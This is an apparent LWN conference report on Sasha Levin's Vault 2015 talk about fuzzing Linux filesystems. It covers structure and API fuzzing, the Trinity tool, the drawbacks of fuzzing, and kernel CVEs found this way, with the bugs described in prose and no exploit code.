Filesystem fuzzing
At the inaugural Vault conference, Sasha Levin gave a presentation on filesystem fuzzing—deliberately providing random bad input to the kernel to try to find bugs. He described different kinds of fuzzing, along with giving examples of some security bugs that were found. The conference itself focused on Linux storage and filesystems and was held March 11-12 in Boston. It attracted around 400 attendees, which has led the Linux Foundation to schedule another Vault for next year in Raleigh, North Carolina.
Levin started by saying that Linux has a problem with "shitty code". That's not because the developers are not skilled, nor is it that code review is going by the wayside. The biggest problem is that the code does not get all that much testing until after it is merged into the mainline. At that point, users get their hands on it and start to find bugs.
Kernel testing
Testing the kernel is done by multiple groups in the ecosystem. Developers will run some tests against their code; for filesystems those tests might include xfstests. Quality assurance (QA) groups will also run tests, but those are typically limited to existing test suites with a known set of tests. The kernel is a "big, scary machine", he said, and it needs more testing.
There are two different kinds of testing: manual and automated. Manual tests are typically run by developers based on the code they changed. If a developer changes the open() call, for example, they "poke it a little bit" to see if anything is broken. That kind of testing is slow and requires a human to create, run, and interpret the tests. It doesn't really scale so that multiple testers could get involved, either.
Automated tests essentially perform the manual tests automatically. Once a test suite covers the basics, though, people stop adding tests except to check for regressions. There is not much done with these test suites (such as the Linux Test Project, xfstests, Filebench, IOzone, and others) to find new bugs. In addition, there is no real effort to test new features.
Users test the code by doing their normal work. They may have a technical background, but they did not review the patches and are not working on the filesystem. They are just trying to get their work done and have not set out to test anything.
There are some things missing from today's testing. Test developers don't try to guess what users will or won't do so that tests cover the corner cases. Test suites generally just check for regressions. In addition, there is little imagination that goes into test development, since creating new features is much more interesting to developers than creating new tests.
For example, he mentioned the __GFP_NOFAIL issues that have been discussed in kernel forums (including the Linux Storage, Filesystem, and Memory Management (LSFMM) Summit) recently. Dave Chinner added tests to xfstests to observe that problem, but only after the problems had been hit. That means that someone ran into those problems and ended up with a corrupted filesystem. It would be nice to find those kinds of problems before someone hits them and ends up complaining about a "shitty kernel", he said.
Fuzzing
Fuzzing is a technique that effectively creates new tests on the fly. Some of those tests are stupid, but others may find bugs. In addition, fuzzing frameworks tend to be heavily threaded which puts a different kind of load on filesystems. The existing test suites do put a load on the filesystem, but it is basically the same load over and over again. So fuzzing can help test concurrency in the filesystem as well.
"Structure fuzzing" simply takes a filesystem image, makes some changes to it, and then tries to mount it. Some of those tests have found kernel crashes or panics at mount time. But not every corruption can or will be found at mount time because that is too expensive to check. Testing with other operations will show whether the corruption is handled appropriately post-mount.
But just flipping every bit in the filesystem image doesn't really make too much sense as a test. That's where "smart structure fuzzing" comes into play. This kind of testing is filesystem-specific as it must have some knowledge of the structure of the filesystem. Since that structure can't really change often (it resides on-disk), this kind of testing does not need to be done all of the time. It can be run occasionally, especially when there are changes that might affect the binary format.
"API fuzzing" is more popular, Levin said. It typically fuzzes the virtual filesystem (VFS) layer, so it is not necessarily filesystem-specific. Basically, API fuzzing tries passing lots of different values to the system calls to see if it can break something.
"Smart API fuzzing" takes that one step further by incorporating knowledge about the kinds of values that make sense as parameters to the system calls. For example, chmod() takes a path and a mode. The first check in chmod() is to see if the mode value is reasonable, so sending all of the 216 possibilities doesn't make sense all of the time. Doing that occasionally is useful, but it is overkill to test the same error path over and over.
As an example of what this kind of fuzzing can find, Levin pointed to CVE-2015-1420. It is an invalid memory access in open_by_handle_at() that was found because the fuzzer knew what the function expects. In a multithreaded test, it was able to change the size in a structure between the time it was used for allocating a buffer and the time it was used to actually read the data. Since the fuzzer had knowledge of the parameters and their types, it could change them in multiple threads.
Having many threads all accessing the filesystem is a place where fuzzers shine. For example, simulating 10,000 users is easy, which can help catch untested scenarios, he said. It makes it easier to catch problems where a lot of load is needed to hit them.
CVE-2014-4171 was an example of a bug that needed a high load to find. It is a local denial of service that can happen when accessing the region around a hole in a file using mmap() while that hole is being punched in another thread. It was easy to see in the code once it was discovered, but it was only found under heavy load from the fuzzer.
That is one of the benefits of fuzzing, he said, that it creates tests that no filesystem developer would ever think of. It will do things that are not reasonable and don't make any sense. For example, CVE-2014-8086 is a race condition that was discovered when switching between asynchronous I/O and direct I/O, which is something that "no one really does". But a malicious user can, of course.
It is nice to know that some set of tests cover most or all of the lines of code of interest, but it does not mean that the code is right. There are multiple paths through any code, so it is important to have lots of threads exercising different paths from different places. Executing rarely used paths is useful as well.
Disadvantages
There are some disadvantages to fuzzing, though. For one thing, there is no pass/fail criteria. Since it is random, you can't say that if it runs for an hour it is considered a "pass". It may miss completely obvious errors. As Peter Zijlstra put it, running for some length of time "doesn't mean that the behavior is right, just that it didn't explode". There may be plenty of bugs lurking that just don't cause a big enough problem to crash the test (or the kernel).
Fuzzing really needs to run continuously, Levin said. It can't just be run overnight and checked in the morning. Instead it should be run continuously and checked daily. Fuzzing is a resource hog too, but that actually helps testing the memory management code, especially for huge pages. The tests split lots of pages and make it hard to collapse them back into huge pages, he said.
Reproducing bugs found by the fuzzer can be quite difficult. Unfortunately, the right answer for causing the bug to happen again is often "run the fuzzer and wish for the best". It is difficult to output the results of tests because the amount of data slows the system down. Things like the last system call made aren't all that helpful, he said. Intel's Processor Trace (which Levin learned about at LSFMM) may help the situation eventually.
Levin suggested that the community should be doing more fuzzing. Developers should be doing some fuzzing before they send in patches and QA folks should be fuzzing continuously. A QA person in the audience asked about getting more information out of the kernel when it fails from fuzzing. Levin suggested setting up the kernel to do a memory dump when it gets a BUG_ON(). He will also be working on better BUG_ON() reporting.
He uses the Trinity fuzz tester for all of the API fuzzing and a different, unnamed tool for filesystem structure fuzzing. He runs Trinity in a virtual machine, while Trinity developer Dave Jones runs it on real hardware, so they find different kinds of bugs. Levin has not gotten to the point where he can run Trinity on linux-next for a week without hitting problems; so far he has not needed to look anywhere else for fuzzing tests.
[I would like to thank the Linux Foundation for travel support to Boston
for Vault.]
| Index entries for this article | |
|---|---|
| Kernel | Filesystems/Fuzzing |
| Security | Fuzzing |
| Security | Linux kernel/Tools |
| Conference | Vault/2015 |